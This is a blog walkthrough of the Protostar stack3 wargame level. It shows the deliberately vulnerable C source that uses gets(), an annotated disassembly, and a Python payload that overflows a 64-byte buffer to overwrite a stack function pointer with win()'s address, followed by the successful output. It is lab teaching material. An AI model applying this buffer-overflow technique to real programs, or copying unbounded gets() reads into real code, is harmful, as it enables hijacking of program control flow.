Hello Guyz,
Today, in this post I am going to share with you the walkthrough process to win the Protostar stack3 level.
But before starting this walkthrough, I want to highlight a few points.
- I'm not the creator of the Protostar war game. I am just a player.
- Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.
- Understand all previous levels before starting this one.
- Do some research on assembly, C/C++ and gdb.
Source Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
    printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
    volatile int (*fp)();
    char buffer[64];

    fp = 0;

    gets(buffer);

    if(fp) {
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();
    }
}
Hints Provided By Exploit-Exercise
Stack3 looks at environment variables, and how they can be set,
and overwriting function pointers stored on the stack
(as a prelude to overwriting the saved EIP)
Hints: both gdb and objdump are your friends in determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3
Disassembly Of Main Routine
Dump of assembler code for function main:
0x08048438 <main+0>:  push   ebp                        ; function prologue
0x08048439 <main+1>:  mov    ebp,esp
0x0804843b <main+3>:  and    esp,0xfffffff0             ; align the stack to 16 bytes
0x0804843e <main+6>:  sub    esp,0x60                   ; reserve 0x60 (96) bytes of stack space
0x08048441 <main+9>:  mov    DWORD PTR [esp+0x5c],0x0   ; fp = 0; fp lives at esp+0x5c (the overwritable area)
0x08048449 <main+17>: lea    eax,[esp+0x1c]             ; eax = &buffer; buffer starts at esp+0x1c
0x0804844d <main+21>: mov    DWORD PTR [esp],eax        ; pass buffer as the argument
0x08048450 <main+24>: call   0x8048330 <gets@plt>       ; gets(buffer), no length check
0x08048455 <main+29>: cmp    DWORD PTR [esp+0x5c],0x0   ; compare fp with zero
0x0804845a <main+34>: je     0x8048477 <main+63>        ; if fp == 0, jump to leave
0x0804845c <main+36>: mov    eax,0x8048560              ; eax = address of the printf format string
0x08048461 <main+41>: mov    edx,DWORD PTR [esp+0x5c]   ; edx = fp
0x08048465 <main+45>: mov    DWORD PTR [esp+0x4],edx    ; second printf argument: fp
0x08048469 <main+49>: mov    DWORD PTR [esp],eax        ; first printf argument: format string
0x0804846c <main+52>: call   0x8048350 <printf@plt>
0x08048471 <main+57>: mov    eax,DWORD PTR [esp+0x5c]   ; eax = fp
0x08048475 <main+61>: call   eax                        ; fp(): indirect call through the pointer we control
0x08048477 <main+63>: leave
0x08048478 <main+64>: ret
Stack Status
Byte offsets from esp:

  0                 28                                  92        96
  +-----------------+-----------------------------------+---------+
  | other things    | buffer[64] (our input lands here) | fp      |
  +-----------------+-----------------------------------+---------+
                                                          ^
                                             overwrite this with &win

This works because the code calls fp() through the pointer without ever checking what it points to.
Our Plan
As we did in the previous walkthrough, we are again going to overwrite another variable stored on the stack right after the buffer. Basically, we overflow the buffer with more than 64 characters, but this time, instead of writing arbitrary characters, we overwrite the fp variable with the address of the win function. Why?
Because, as we can see in the source code, once the if condition is satisfied the code treats fp as a function pointer and calls it. So we just insert the win function's address into fp's memory area.

    if(fp) {
        printf("calling function pointer, jumping to 0x%08x\n", fp);
        fp();
    }

To find the win function address we can use objdump, like this:

# objdump -d /opt/protostar/bin/stack3 | grep "win"
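To see why exactly 64 bytes of filler are needed, and why bounding the read is the fix, here is an added example (my own code, not part of the original post or of Protostar) that models main()'s frame in Python using the offsets from the disassembly above, parses the win address out of a constructed sample of objdump output, and compares an unbounded gets()-style copy with an fgets()-style bounded one.

```python
import re
import struct

# Frame layout taken from the disassembly of main():
FRAME_SIZE = 0x60                 # sub esp,0x60
BUFFER_OFF = 0x1c                 # lea eax,[esp+0x1c]  -> &buffer
FP_OFF = 0x5c                     # mov DWORD PTR [esp+0x5c],0x0 -> fp = 0
BUFFER_LEN = FP_OFF - BUFFER_OFF  # 64: fp sits immediately after buffer[64]

# Constructed sample of the function-header line that
# `objdump -d stack3 | grep win` prints (address as shown in the post).
OBJDUMP_SAMPLE = "08048424 <win>:\n"


def symbol_address(objdump_output, symbol="win"):
    """Pull a function's start address out of objdump -d output."""
    pattern = r"^([0-9a-f]{8}) <" + re.escape(symbol) + r">:"
    m = re.search(pattern, objdump_output, re.M)
    if m is None:
        raise ValueError("symbol %s not found" % symbol)
    return int(m.group(1), 16)


def build_payload(target):
    """64 filler bytes exhaust buffer; the next 4 land on fp (little-endian)."""
    return b"a" * BUFFER_LEN + struct.pack("<I", target)


def run_main(line, bounded):
    """Model main(): fp = 0, copy one input line into buffer, return fp.

    bounded=False behaves like gets(buffer): copies everything.
    bounded=True behaves like fgets(buffer, sizeof buffer, stdin): at most
    63 bytes plus the terminating NUL, so fp can never be reached.
    """
    # A few spare bytes above the frame so gets()'s terminating NUL has
    # somewhere to land in the model, as it would in the caller's area.
    frame = bytearray(FRAME_SIZE + 4)
    struct.pack_into("<I", frame, FP_OFF, 0)
    data = line[:BUFFER_LEN - 1] if bounded else line
    if BUFFER_OFF + len(data) >= len(frame):
        raise ValueError("input longer than the modelled frame")
    frame[BUFFER_OFF:BUFFER_OFF + len(data)] = data
    frame[BUFFER_OFF + len(data)] = 0
    return struct.unpack_from("<I", frame, FP_OFF)[0]


if __name__ == "__main__":
    payload = build_payload(symbol_address(OBJDUMP_SAMPLE))
    print("gets :  fp = 0x%08x" % run_main(payload, bounded=False))
    print("fgets:  fp = 0x%08x" % run_main(payload, bounded=True))
```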
Exploit
#!/usr/bin/python
import struct

payload = ''
payload += 'a' * 64                        # fill buffer[64] exactly
payload += struct.pack("<I", 0x08048424)   # next 4 bytes overwrite fp with the address of win (little-endian)
print payload
Yesss.. Another Victory.
Output
root@protostar:/opt/protostar/bin# python exploit.py
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$�
root@protostar:/opt/protostar/bin# python exploit.py > tmp
root@protostar:/opt/protostar/bin# ./stack3 < tmp
calling function pointer, jumping to 0x08048424
code flow successfully changed
root@protostar:/opt/protostar/bin#